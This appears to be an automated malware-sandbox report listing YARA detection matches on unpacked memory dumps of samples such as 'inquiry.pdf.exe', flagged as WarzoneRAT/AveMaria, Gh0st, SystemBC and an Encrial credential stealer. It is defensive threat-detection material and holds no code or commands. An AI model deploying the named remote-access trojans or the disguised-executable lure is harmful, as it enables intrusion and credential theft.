Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.3.AddInProcess32.exe.e95278.8.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.3.AddInProcess32.exe.e95278.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.3.AddInProcess32.exe.ea6d50.9.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea6d50.9.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.3.AddInProcess32.exe.ea6d50.6.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea6d50.6.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
